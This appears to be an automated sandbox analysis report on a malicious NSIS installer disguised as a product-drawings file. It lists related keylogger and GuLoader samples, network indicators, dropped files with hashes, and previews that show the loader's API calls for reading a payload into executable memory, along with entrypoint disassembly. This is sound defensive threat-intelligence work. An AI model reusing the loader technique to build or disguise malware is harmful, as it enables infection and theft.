                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
                                                                  • 129.147.170.96
                                                                  SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                                                  • 129.146.156.199
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  dhl Express awb _ docs 73907708353. _17.09.2024 %100%_docx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.6.168

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9adEnquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  24924_Payment.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  Inv_230924193849328483pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  SWIFT COPY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  dekont_20240918_38847738373.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  Richiesta di preventivo__DOULIK INDUSTRIES Co (PTE) Ltd___PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  TRANSFERENCIA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 172.67.177.134
                                                                  3b5074b1b5d032e5620f69f9f700ff0e 1504 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                  • 149.154.167.220
                                                                  IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  https://geemennilogii.gitbook.io/Get hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.htmlGet hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  http://218.203.148.37.host.secureserver.net/?BLzDqtOtKg=YbkczbGNvZWxob0BlZW0ucHQ=Get hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  • 149.154.167.220
                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.220
                                                                  http://coinnbbasuproslogen.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 149.154.167.220
                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.220

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dllRFQ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    RFQ.exeGet hashmaliciousGuLoaderBrowse
                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                        RFQ.exeGet hashmaliciousUnknownBrowse
                                                                          Document#.exeGet hashmaliciousRemcosBrowse
                                                                            Document#.exeGet hashmaliciousUnknownBrowse
                                                                              dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                dhl_awb_shipping_invoice_24_05_2024_000000000000024.exeGet hashmaliciousGuLoaderBrowse
                                                                                  vpv0eXLADR.exeGet hashmaliciousGuLoaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\nsc21DE.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):4.256564762130954
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                                    MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                                    SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                                    SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                                    SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:user32::EnumWindows(i r1 ,i 0)

                                                                                    C:\Users\user\AppData\Local\Temp\nsg1EA1.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):56
                                                                                    Entropy (8bit):4.1929554228332
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sAAEVvjsd1o84n:fLV
                                                                                    MD5:AE7C0E5EC83AA79C677749769D8548CE
                                                                                    SHA1:CFA4516337AFC5CE5F786B2E78740DAC4AF5CD47
                                                                                    SHA-256:4015F44C7FA491CA2E52C797A3CD77CBA2C3AEF3584A6710B9E7C71411605008
                                                                                    SHA-512:A797354195BB5FCFEAB9C49B98C88EB4B164CC2745EE4EE73EB51892885D56259A93F4FFA667ECE905F4C1F060D451CE1F1098B14BD5DC049387D7A27678DA18
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:kernel32::ReadFile(i r5, i r1, i 48144384,*i 0, i 0)i.r3

                                                                                    C:\Users\user\AppData\Local\Temp\nsi1855.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):52
                                                                                    Entropy (8bit):4.0914493934217315
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                                    MD5:5D04A35D3950677049C7A0CF17E37125
                                                                                    SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                                    SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                                    SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

                                                                                    C:\Users\user\AppData\Local\Temp\nsr1362.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):74
                                                                                    Entropy (8bit):3.9637832956585757
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                    MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                    SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                    SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                    SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

                                                                                    C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11264
                                                                                    Entropy (8bit):5.72460245623286
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
                                                                                    MD5:CF85183B87314359488B850F9E97A698
                                                                                    SHA1:6B6C790037EEC7EBEA4D05590359CB4473F19AEA
                                                                                    SHA-256:3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                                                                                    SHA-512:FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                    • Filename: Document#.exe, Detection: malicious, Browse
                                                                                    • Filename: Document#.exe, Detection: malicious, Browse
                                                                                    • Filename: dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe, Detection: malicious, Browse
                                                                                    • Filename: dhl_awb_shipping_invoice_24_05_2024_000000000000024.exe, Detection: malicious, Browse
                                                                                    • Filename: vpv0eXLADR.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...k..Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsz1B73.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.3961372137069485
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:sEMBQEJkJVEjBm/MFWxQoXUn:+RWxvUn
                                                                                    MD5:210E1DB7D57A610F482EAD12F5D55546
                                                                                    SHA1:611874360D76CE3BC238EC9F335E54E422B87FA5
                                                                                    SHA-256:18186F100AD3AEE037C814D04A1F8BA01B8FD760A524FBEE988380DC2DCE250A
                                                                                    SHA-512:8900C502AA8365673EF13EEA6738358D261BD689CDB2C738AB155461167ACDF60494F1102BF9A1D81E116697FA943A6B06A3733C2FBC0B87F56814C56F6B4F00
                                                                                    Malicious:false
                                                                                    Preview:kernel32::VirtualAlloc(i 0,i 48144384, i 0x3000, i 0x40)p.r1

                                                                                    C:\Users\user\AppData\Local\jazy.lnk

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):960
                                                                                    Entropy (8bit):3.331494472222597
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8wl0BRsXUjgJEIXYWd8FKEMJsW+sl38MPAE0B33laZmN1U4t2YCBTo:8l+CeYWd8FKnyG1InB3UZCiJT
                                                                                    MD5:02B3AD0BC72EFF61E281F4DBFC87ED33
                                                                                    SHA1:02DD8D792844FE5CE72D5CB1856BFE1257E96896
                                                                                    SHA-256:640E2C2FC86090DE80A73C5A585FA7ED73E264ADB0F732DB2B915CBE347AA3E8
                                                                                    SHA-512:E224E70D7B2C3807ED4459A6FE9E4640BEBC278DCBA755639392145533D60C3FF3C0CE3E63B488F54345578C7C144001D56C394FECE8DE090E3AC114769D8AF9
                                                                                    Malicious:false
                                                                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................D.y.l.a.n.e.....\.1...........Documents.D............................................D.o.c.u.m.e.n.t.s.....b.2...........skinder.mun.H............................................s.k.i.n.d.e.r...m.u.n.............\.....\.D.o.c.u.m.e.n.t.s.\.s.k.i.n.d.e.r...m.u.n.o.C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.k.o.n.f.l.i.k.t.t.i.l.s.t.a.n.d.e.n.e.s.\.p.o.l.y.a.u.t.o.g.r.a.p.h.y.\.c.r.o.t.a.l.i.d.\.U.r.g.i.n.g.............-...............#.F..l.H.i.-...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.3.................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Aerolitic.opk

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):477423
                                                                                    Entropy (8bit):1.2506672981439135
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:WkOR7fUmO74tFrjEiHzBA0n/FHjfyzjw0W1wtw3/aU00ID:HGcyvHHzpxm40awtp
                                                                                    MD5:95377A86A6EF1A7E49728D904BFF2B04
                                                                                    SHA1:DBD60478FFD1CD3A056B57D2F57931D656081394
                                                                                    SHA-256:AD82696AB378938B13F43641D615DBEA7D09A8F532BBDCF60B91D5A0607A3B21
                                                                                    SHA-512:E0651A4801B2C199990C7954BA00D3E7890F4F2B47A14B07C29BC8DDE8CD7990FF5AB851D803864E8842438074132ABF1C559C7C5ABD6A5F0B00F6F6B56B7D7C
                                                                                    Malicious:false
                                                                                    Preview:F..............................W..........................,...................................^...........Q...........................n.........................................................................................0..................h..{.........%........+.............../...........................>.................[.................. ..........^....................................................O..................................................:..............................................................Z..}.....................................................0......................................d...................................*.....................................................................................1......................(.......................m..........................3..............................................l...T.................=............Q.................................P.........c.............M.........................d.................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Agatize.Ret

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):112909
                                                                                    Entropy (8bit):4.591397373758405
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:oCMHd1/BH7JP0IejKdjw+v4TopG+CweDDKX+NnRFCpWYfwXcRra:g/xJ0pj+LcDDyy/YfwXcRra
                                                                                    MD5:89C45E07E092936DE73A3A8CA0842133
                                                                                    SHA1:CA94EFB89EAA96D88D5990081B0008500164CB61
                                                                                    SHA-256:77C5C49D07CCF105A686FA9BDFE14FCD558013CDD3FB5B8428B8C0A8E7B444CD
                                                                                    SHA-512:F2802A989BE14B8FC574B3FB72422A543325CD59D3EEFE38108B9CCD60E13CEB517665D5667B5965177746F1E95F3CEB86C794AC2B76A3E93711301008EF7335
                                                                                    Malicious:false
                                                                                    Preview:..............PPP...2..S...y..BB......YYYY..```............................._.{{{{..P.l.$................................M.GGG..............mm..........t....JJ.............S...................44............./.........9............................;.........................jjj................WW..........))...................~~............uu..............z................&....[..<..........77...............................F.'......z........u.....................o..T......................D..~..........[[...............eee....;.ii............C...........(.E..+....u.........III....R......xx..:...((...............J.a..=.....gg..m....KKKKKKK.....................C.....7............u../.,.....................................&....U.b..ZZ........77..........xxx....```....'........................88.............................}........!.<<<<<<<<<....!!...|..............[.RRRR.!.S.....''....................L.........................,,.......................o..........H..............................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging\ssterparti.inc

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):249627
                                                                                    Entropy (8bit):1.2496968633941035
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:bpNIZEedqLV/+lQDfk647so85yNWd/22GUMUq5kQZb+N7LH7NJroTBAO/neZh07v:tNXB4IpvbHrcpT7wch7
                                                                                    MD5:E31CA15A1FA461A37BDEF089CE7C1AEB
                                                                                    SHA1:C11D4F0C0B9B7EC01405DF760BF57DD05C1320EB
                                                                                    SHA-256:C177C2438C3B76CDA1D7429835387A4025A29E0804019917A637653985D7A21D
                                                                                    SHA-512:0C1E2DCCF5B147FAFF87BC6A785F08BCAC243899F54B58BF1386E3EE8DF0B1CDEF6DC07FF4E4EA8C7D81DCAD7EB1516EF9BC216FCF5EE1DD17D20BD0733D27F4
                                                                                    Malicious:false
                                                                                    Preview:.....................-...|.............................Z........................................................~......T.................................................................................................................................[....F....................................................................................B...................................................................................j..........x......r.............................x...(...........H......................................*...................................$.y..................{...\........~.......................................................h............#....................&.......+.............................................................+.........................................................w............................................................{...............{........................H......................................S.......e....................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\cuocos.hal

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):227146
                                                                                    Entropy (8bit):1.2507962577643048
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:6rzdwfqNWzLNV9xQfldyXMlAW7/QmwODzSwoIOFI4Z47LZYraJuQaUv+ExLyVDbU:QgulAY/jjLKm3Se4W/RCtk
                                                                                    MD5:1B56689CE88E0D73CBC9729C939F4343
                                                                                    SHA1:6E202730B13AFC6AAD3AF416BA1DF2F9D9D61C10
                                                                                    SHA-256:BA9B41B120C3F48A1E5615BF65EC729DE135F5A73B0F2F910510E2AD10DCF03F
                                                                                    SHA-512:A0510253E13D45B1925B065E3AB35723752D4ADA9C53146B97A6D372D8C218093554D7CB16F8102A10FBAB907B392E832AC03FDA5E8E9E944FA3B8814C231CC0
                                                                                    Malicious:false
                                                                                    Preview:...........a..z.........................)....................3...............................................................................................................................................................................................................c.........R..........................<...............................................s....................................................................R................N...@......................................................J....................................................?............................P.......................................................T........................4...............M.............................S..........................................................t.t...............)..........!........"7................................................................;...............................M............v................+.../..5................................................o..........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\holosaprophyte.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):528
                                                                                    Entropy (8bit):4.28284467655082
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Uh++iS7FwoXJSAN2NqE77aWVk7PQvnPWFlHXLZTAd:Uh7xwoXf2UEHLe7Qmz7ZTW
                                                                                    MD5:19CF575DB84A92DCE3430894128142B0
                                                                                    SHA1:0C9628D7A7ABA3D61DA337A8C2997391309CEDA8
                                                                                    SHA-256:F63EBFFB144306D1FCA9BBD00F443B60BBEB019D469BD63DD83D960ECD3DC9AA
                                                                                    SHA-512:EFFC75C60402B65F554E454C15B52A8C90D232AEF16007EE151D4EC924C486BC29B07DBD9049C0E33B3DC5A9FC49B53C58FE233ED38F3A6700475E07C04D0D06
                                                                                    Malicious:false
                                                                                    Preview:udparcelleres kardinalens apprehensions tetanical korpsene kjolesttets.tapstederne factoringselskaberne staffing uproariously angulo sterhytte aliptae intetanende cavalcaded sladdervorn pjaskfuldt sjlen..launches chowries kriminalkommissr researchful.sinologist maximillian unitarismes eftermodning unusurping decarbonize barytpapirs unjuridical etiopiernes skdebarn..radicalness brushanernes anthoecologist nedtones unfunded tass sloganizes..formodnings kommercielle relativstnings electronography husassistenters drivhusenes..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\redefying.way

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):434486
                                                                                    Entropy (8bit):6.995272621270874
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:3kVhUPrseov2p7np9ELPZWefolMx495ZfCHgsYgy4Ar5:mPeov2tnPGZPdJHgsYgCr5
                                                                                    MD5:E7D15ADB4309C1B63FEF61602F91390D
                                                                                    SHA1:8552DD90E02579447A9FBE6A5A3FDA8BB153E3FF
                                                                                    SHA-256:5D3ACD5712116FF97CC7DC47AA2647232FBFD7869AF4A2FB9F164E6270E870F8
                                                                                    SHA-512:A6D3D47F002CF138D74516D0613836B25719954A0030907D1294AFC9C868148F0BB555F349E17AF5DD4C1CC57295C84F080F9A72EA8958384AE1714257CB57AC
                                                                                    Malicious:false
                                                                                    Preview:...//.......O.""".66....................B..7.,.pp......OOOOOOO..................TT...........<......JJ.]]......aaa.x..................uu..........]....3333..#.....,...k.....666666.......w..........ee........................~~~~.++.........LL.......j..t.............~..............<.........V......................................""...................... .................................................................@........MMM..t.Q.................e.UUU.........3.....X.....]....7.....................Y..O..............................__...............|..U.SS..............>>>>.................444..///.YYY...vv....b......%.................................k.}.....................>...........{......]]...****...........^.....................00.................i.........j.4.kkk....#......T....6666.......L.................................0..66666...y...................xx.#.]....tttt........qqq...-.......................H.........~..........................;;...................................

                                                                                    C:\Users\user\AppData\Roaming\stub\Sophia.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Category:dropped
                                                                                    Size (bytes):634320
                                                                                    Entropy (8bit):7.8636262102112875
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:2qkIddrO3HTLOGOlN1ruuG3DeoNjqqtRaG31TAHcF1umM:3vdxOXTL+bi/dXaGDF1umM
                                                                                    MD5:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    SHA1:D904EFBF202092B4B29862951C2B39D1C298AC1B
                                                                                    SHA-256:87DA16B9E0F9FC7D74735C59B920DEA8460D91F497380AA1A83834B86771B9E2
                                                                                    SHA-512:15ACD62254345446B20D040924C397989FF7FB3257C01DE6F998FD36A4798D696942A9E9A939158133622E4927F1F155FC5DB946C5A92C64F73F625D078774D0
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9......0.......p....@...........................<..............................................s........<.............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata.......0:..........................rsrc.........<......v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.8636262102112875
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    File size:634'320 bytes
                                                                                    MD5:9ca0138738dcc4faa58c59c0898d4834
                                                                                    SHA1:d904efbf202092b4b29862951c2b39d1c298ac1b
                                                                                    SHA256:87da16b9e0f9fc7d74735c59b920dea8460d91f497380aa1a83834b86771b9e2
                                                                                    SHA512:15acd62254345446b20d040924c397989ff7fb3257c01de6f998fd36a4798d696942a9e9a939158133622e4927f1f155fc5db946c5a92c64f73f625d078774d0
                                                                                    SSDEEP:12288:2qkIddrO3HTLOGOlN1ruuG3DeoNjqqtRaG31TAHcF1umM:3vdxOXTL+bi/dXaGDF1umM
                                                                                    TLSH:28D4120BFE8D036ED39D46B239BB0278CB59CF5351906856BBC5FDAE583168DA8430D2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9....

                                                                                    File Icon

                                                                                    Icon Hash:24ed8d96b2ade832

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4030ef
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x51E30576 [Sun Jul 14 20:09:26 2013 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:b40f29cd171eb54c01b1dd2683c9c26b

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN="Opiniater Unvolatile ", O=Skyldneren, L=Rockland St Peter, S=England, C=GB
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 31/12/2023 02:53:52 30/12/2026 02:53:52
                                                                                    Subject Chain
                                                                                    • CN="Opiniater Unvolatile ", O=Skyldneren, L=Rockland St Peter, S=England, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:3D226A56E03EFAA16289060A91F23E1C
                                                                                    Thumbprint SHA-1:405658081748E5E8A626AD0EF5A077FCBADAE86E
                                                                                    Thumbprint SHA-256:229F170A4B19E73BADFF4BE275F919526541F7A240F2EA997996B3D677B34936
                                                                                    Serial:015F1E3D2215A6DAC3895182D244853A80F08D13

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000184h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409190h
                                                                                    mov dword ptr [esp+20h], ebx
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407034h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B0h]
                                                                                    push ebx
                                                                                    call dword ptr [0040728Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [007A27B8h], eax
                                                                                    call 00007F66E8A55B48h
                                                                                    mov dword ptr [007A2704h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+38h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0079DCB8h
                                                                                    call dword ptr [00407164h]
                                                                                    push 00409180h
                                                                                    push 007A1F00h
                                                                                    call 00007F66E8A557F2h
                                                                                    call dword ptr [0040711Ch]
                                                                                    mov ebp, 007A8000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F66E8A557E0h
                                                                                    push ebx
                                                                                    call dword ptr [00407114h]
                                                                                    cmp byte ptr [007A8000h], 00000022h
